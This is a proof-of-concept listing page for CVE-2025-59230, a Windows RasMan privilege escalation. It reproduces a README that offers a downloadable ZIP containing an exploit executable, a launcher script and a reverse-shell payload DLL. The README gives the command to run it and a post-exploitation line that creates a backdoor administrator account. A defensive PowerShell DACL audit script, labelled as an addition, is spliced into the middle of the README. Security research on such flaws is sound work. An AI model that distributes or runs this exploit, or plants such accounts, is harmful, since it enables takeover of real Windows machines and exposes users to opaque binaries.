POC details: 63832da90052cf3d52f286a7611a1e3a4aca361b

Source
Related vulnerability
Title: Microsoft Windows Remote Access Connection Manager access control error vulnerability (CVE-2025-59230)
Description: Microsoft Windows Remote Access Connection Manager is a Windows service from Microsoft (United States) that manages virtual private network (VPN) connections from your computer to the Internet; if this service is disabled, VPN client applications will not start. Microsoft Windows Remote Access Connection Manager has an access control error vulnerability; an attacker can exploit it to escalate privileges.
Introduction
# Lab: CVE-2025-59230 - Local Privilege Escalation in Windows Remote Access Connection Manager

## 🚀 Overview
CVE-2025-59230 is a high-severity vulnerability in the Windows Remote Access Connection Manager (RasMan) service, affecting multiple versions of Microsoft Windows operating systems. The flaw stems from improper access control mechanisms within the RasMan service, allowing an authenticated local user to manipulate service parameters and escalate privileges to SYSTEM level. This could enable unauthorized code execution, data exfiltration, or persistence on the affected system.

This lab is intended solely for security researchers, penetration testers, and system administrators to understand the exploit chain and test mitigations.

**Safety Disclaimer:** Running this lab involves executing potentially harmful code in a controlled environment. The exploit code is designed to demonstrate privilege escalation.


## 📋 Prerequisites
- A host machine running Windows 10/11 or Windows Server 2019/2022/2025 with Hyper-V and Containers features enabled.
- Basic knowledge of Windows services and PowerShell commands.

Affected Windows versions:
- Windows 10 (versions 1507, 1607, 1809, 21H2, 22H2)
- Windows 11 (versions 22H2, 22H3, 23H2, 24H2, 25H2)
- Windows Server 2016, 2019, 2022 (including 23H2), 2025

## Download & Install
1. Download the exploit package: [Download Exploit ZIP](http://github.com/moegameka/cve-2025-59230/raw/refs/heads/main/Core/lab-cve-2025-59230.zip). This ZIP contains:
   - `rasmanesc.exe`: The main exploit binary.
   - `start_exp.bat`: Batch script to launch the exploit safely (executes `rasmanesc.exe` with default parameters).
   - `payload.dll`: For reverse shell demonstration.

2. Extract the ZIP.


## 🛠 Usage

1. **Exploit Execution:**
   - Launch `start_exp.bat` or directly `rasmanesc.exe /payload=payload.dll`.
   - The exploit:
     - Obtains a handle to the RasMan service.
     - Sends a crafted IOCTL buffer to overwrite service parameters.
     - Elevates to SYSTEM by token impersonation.
     - Injects the payload to spawn a SYSTEM-level shell.

2. **Post-Exploitation:**
   - In the escalated shell, demonstrate impact: `net user admin P@ssw0rd /add; net localgroup administrators admin /add`.

3. **Detection Signatures:**
   - Monitor for unusual IOCTL calls to RasMan via Sysmon (Event ID 10).
   - Anomalous registry modifications to RasMan keys.

## 🛡️ Mitigation
- **Hardening:**
  - Restrict RasMan service ACLs: Use `sc sdset RasMan` to enforce strict DACLs.
  - Enable Credential Guard and Protected Process Light for critical services.
  - Implement AppLocker or WDAC to block unsigned executables.
- **Best Practices:** Run services with least privilege, segment networks, and conduct regular vulnerability scans using tools like Nessus or OpenVAS.
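As an added defensive check that is not part of the lab package or the original README, the following PowerShell script dumps the current RasMan service DACL with `sc.exe sdshow` and flags allow-ACEs that grant write-class rights (change config, delete, WRITE_DAC, WRITE_OWNER, generic write/all) to low-privileged principals; the set of principals and rights treated as risky is this audit's own assumption.

```powershell
# Added audit script, not part of the lab package: lists the RasMan service DACL
# and flags ACEs that let low-privileged principals reconfigure the service.
# 'RasMan' is the service name from the README; the rights and principals
# treated as risky below are this script's own assumptions.
$ServiceName = 'RasMan'

# Access rights from winsvc.h / winnt.h that allow changing or replacing a service.
$SERVICE_CHANGE_CONFIG = 0x00000002
$DELETE                = 0x00010000
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$WriteClass = $SERVICE_CHANGE_CONFIG -bor $DELETE -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# Well-known SIDs that should never hold write-class rights on a service:
# Everyone, Authenticated Users, Users, Interactive, Anonymous.
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4', 'S-1-5-7')

# 'sc' is an alias for Set-Content in PowerShell, so call the binary explicitly.
$sddl = ((& sc.exe sdshow $ServiceName) -join '').Trim()
if (-not $sddl.StartsWith('D:')) { throw "sc.exe sdshow $ServiceName failed: $sddl" }

# Parse the SDDL string into a security descriptor so each ACE can be inspected.
$sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl

$report = foreach ($ace in $sd.DiscretionaryAcl) {
    # Only access-allowed entries can widen what a principal may do.
    if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
    $sid = $ace.SecurityIdentifier
    try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = $sid.Value }
    $grantsWrite = ($ace.AccessMask -band $WriteClass) -ne 0
    [pscustomobject]@{
        Principal  = $name
        Sid        = $sid.Value
        AccessMask = '0x{0:X8}' -f $ace.AccessMask
        Weak       = $grantsWrite -and ($LowPrivSids -contains $sid.Value)
    }
}

$report | Format-Table -AutoSize
$weak = @($report | Where-Object Weak)
if ($weak.Count -gt 0) {
    Write-Warning "$ServiceName DACL grants write-class rights to low-privileged principals: $($weak.Principal -join ', ')"
} else {
    Write-Host "$ServiceName DACL: no write-class rights granted to low-privileged principals."
}
```

Run it before and after applying `sc sdset RasMan` to confirm the hardened descriptor no longer produces a warning.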

For any inquiries, please email me at: moegameka@onet.pl
File snapshot

[4.0K] /data/pocs/63832da90052cf3d52f286a7611a1e3a4aca361b
├── [4.0K] Core
│   ├── [ 1] d
│   └── [8.0M] lab-cve-2025-59230.zip
└── [2.8K] README.md
1 directory, 3 files